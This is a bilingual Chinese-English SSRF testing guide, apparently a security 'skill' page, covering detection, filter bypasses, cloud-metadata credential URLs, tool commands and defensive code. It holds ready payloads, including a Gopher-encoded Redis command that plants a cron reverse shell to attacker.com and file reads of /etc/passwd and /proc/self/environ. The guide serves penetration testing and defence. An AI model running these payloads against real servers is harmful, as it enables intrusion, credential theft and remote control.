Back to Details

ssrf-testing

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SSRF服务器端请求伪造测试

SSRF (Server-Side Request Forgery) Testing

概述

Overview

SSRF(Server-Side Request Forgery)是一种利用服务器发起请求的漏洞,可以访问内网资源、进行端口扫描或绕过防火墙。本技能提供SSRF漏洞的检测、利用和防护方法。
SSRF (Server-Side Request Forgery) is a vulnerability that exploits servers to initiate requests, enabling access to internal network resources, port scanning, or firewall bypassing. This skill provides methods for detecting, exploiting, and defending against SSRF vulnerabilities.

漏洞原理

Vulnerability Principle

应用程序接受URL参数并请求该URL,攻击者可以控制请求的目标,导致:
  • 内网资源访问
  • 本地文件读取
  • 端口扫描
  • 绕过防火墙
  • 云服务元数据访问
Applications accept URL parameters and request the specified URL. Attackers can control the target of the request, leading to:
  • Access to internal network resources
  • Local file reading
  • Port scanning
  • Firewall bypass
  • Cloud service metadata access

测试方法

Testing Methods

1. 识别SSRF输入点

1. Identify SSRF Input Points

常见功能:
  • URL预览/截图
  • 文件上传(远程URL)
  • Webhook回调
  • API代理
  • 数据导入
  • 图片处理
  • PDF生成
Common Features:
  • URL Preview/Screenshot
  • File Upload (Remote URL)
  • Webhook Callback
  • API Proxy
  • Data Import
  • Image Processing
  • PDF Generation

2. 基础检测

2. Basic Detection

测试本地回环:
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
测试内网IP:
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
测试文件协议:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
Test Local Loopback:
http://127.0.0.1
http://localhost
http://0.0.0.0
http://[::1]
Test Internal Network IPs:
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
Test File Protocol:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts

3. 绕过技术

3. Bypass Techniques

IP地址编码:
127.0.0.1 → 2130706433 (十进制)
127.0.0.1 → 0x7f000001 (十六进制)
127.0.0.1 → 0177.0.0.1 (八进制)
域名解析绕过:
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URL重定向:
http://attacker.com/redirect → http://127.0.0.1
协议混淆:
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1
IP Address Encoding:
127.0.0.1 → 2130706433 (Decimal)
127.0.0.1 → 0x7f000001 (Hexadecimal)
127.0.0.1 → 0177.0.0.1 (Octal)
Domain Resolution Bypass:
127.0.0.1.xip.io
127.0.0.1.nip.io
localtest.me
URL Redirection:
http://attacker.com/redirect → http://127.0.0.1
Protocol Obfuscation:
http://127.0.0.1:80@evil.com
http://evil.com#@127.0.0.1

利用技术

Exploitation Techniques

内网探测

Internal Network Detection

端口扫描:
bash
undefined
Port Scanning:
bash
undefined

使用Burp Intruder

Use Burp Intruder

http://127.0.0.1:22 http://127.0.0.1:3306 http://127.0.0.1:6379 http://127.0.0.1:8080 http://127.0.0.1:9200

**识别服务:**
- 响应时间差异
- 错误信息
- HTTP状态码
- 响应内容
http://127.0.0.1:22 http://127.0.0.1:3306 http://127.0.0.1:6379 http://127.0.0.1:8080 http://127.0.0.1:9200

**Service Identification:**
- Response time differences
- Error messages
- HTTP status codes
- Response content

云服务元数据

Cloud Service Metadata

AWS EC2:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloud:
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
阿里云:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/
AWS EC2:
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
Google Cloud:
http://metadata.google.internal/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
Azure:
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01
Alibaba Cloud:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/ram/security-credentials/

内网应用攻击

Internal Network Application Attacks

访问管理后台:
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Redis未授权访问:
http://127.0.0.1:6379
Access Admin Backends:
http://127.0.0.1:8080/admin
http://192.168.1.100/phpmyadmin
Unauthorized Redis Access:
http://127.0.0.1:6379

然后发送Redis命令

Then send Redis commands


**FastCGI攻击:**
http://127.0.0.1:9000

**FastCGI Attack:**
http://127.0.0.1:9000

利用FastCGI协议执行命令

Execute commands using FastCGI protocol

undefined
undefined

高级利用

Advanced Exploitation

Gopher协议

Gopher Protocol

发送任意协议数据:
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Redis命令执行:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
Send Arbitrary Protocol Data:
gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0aquit%0d%0a
Redis Command Execution:
gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

Dict协议

Dict Protocol

端口扫描和信息收集:
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status
Port Scanning and Information Gathering:
dict://127.0.0.1:6379/info
dict://127.0.0.1:3306/status

文件协议

File Protocol

读取本地文件:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ
Read Local Files:
file:///etc/passwd
file:///C:/Windows/System32/drivers/etc/hosts
file:///proc/self/environ

工具使用

Tool Usage

SSRFmap

SSRFmap

bash
undefined
bash
undefined

基础扫描

Basic Scan

python3 ssrfmap.py -r request.txt -p url
python3 ssrfmap.py -r request.txt -p url

端口扫描

Port Scan

python3 ssrfmap.py -r request.txt -p url -m portscan
python3 ssrfmap.py -r request.txt -p url -m portscan

云元数据

Cloud Metadata

python3 ssrfmap.py -r request.txt -p url -m cloud
undefined
python3 ssrfmap.py -r request.txt -p url -m cloud
undefined

Gopherus

Gopherus

bash
undefined
bash
undefined

生成Gopher payload

Generate Gopher payload

python gopherus.py --exploit redis
undefined
python gopherus.py --exploit redis
undefined

Burp Collaborator

Burp Collaborator

检测盲SSRF:
http://burpcollaborator.net
Detect Blind SSRF:
http://burpcollaborator.net

观察是否有DNS/HTTP请求

Observe if there are DNS/HTTP requests

undefined
undefined

验证和报告

Verification and Reporting

验证步骤

Verification Steps

  1. 确认可以控制请求目标
  2. 验证内网资源访问或端口扫描
  3. 评估影响范围(内网渗透、数据泄露等)
  4. 记录完整的POC
  1. Confirm that the request target can be controlled
  2. Verify access to internal network resources or port scanning
  3. Assess the scope of impact (internal network penetration, data leakage, etc.)
  4. Record complete POC

报告要点

Reporting Key Points

  • 漏洞位置和输入参数
  • 可访问的内网资源或端口
  • 完整的利用步骤和PoC
  • 修复建议(URL白名单、禁用危险协议等)
  • Vulnerability location and input parameters
  • Accessible internal network resources or ports
  • Complete exploitation steps and PoC
  • Fix recommendations (URL whitelist, disable dangerous protocols, etc.)

防护措施

Defense Measures

推荐方案

Recommended Solutions

  1. URL白名单
    python
    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
parsed = urlparse(url)
if parsed.netloc not in ALLOWED_DOMAINS:
    raise ValueError("Domain not allowed")
  2. 禁用危险协议
    • 只允许http/https
    • 禁止file://、gopher://、dict://等
  3. IP地址过滤
    python
    import ipaddress

def is_internal_ip(ip):
    return ipaddress.ip_address(ip).is_private or \
           ipaddress.ip_address(ip).is_loopback
  4. 使用DNS解析验证
    • 解析域名获取IP
    • 验证IP是否在内网范围
  5. 网络隔离
    • 限制服务器出网权限
    • 使用代理服务器
  1. URL Whitelist
    python
    ALLOWED_DOMAINS = ['example.com', 'cdn.example.com']
parsed = urlparse(url)
if parsed.netloc not in ALLOWED_DOMAINS:
    raise ValueError("Domain not allowed")
  2. Disable Dangerous Protocols
    • Only allow http/https
    • Block file://, gopher://, dict://, etc.
  3. IP Address Filtering
    python
    import ipaddress

def is_internal_ip(ip):
    return ipaddress.ip_address(ip).is_private or \
           ipaddress.ip_address(ip).is_loopback
  4. Use DNS Resolution Verification
    • Resolve domain names to get IPs
    • Verify if the IP is within the internal network range
  5. Network Isolation
    • Restrict server outbound access permissions
    • Use proxy servers

注意事项

Notes

  • 仅在授权测试环境中进行
  • 避免对内网系统造成影响
  • 注意不同协议的支持情况
  • 测试时注意请求频率,避免触发防护
  • Only perform tests in authorized environments
  • Avoid impacting internal network systems
  • Note the support status of different protocols
  • Pay attention to request frequency during testing to avoid triggering defenses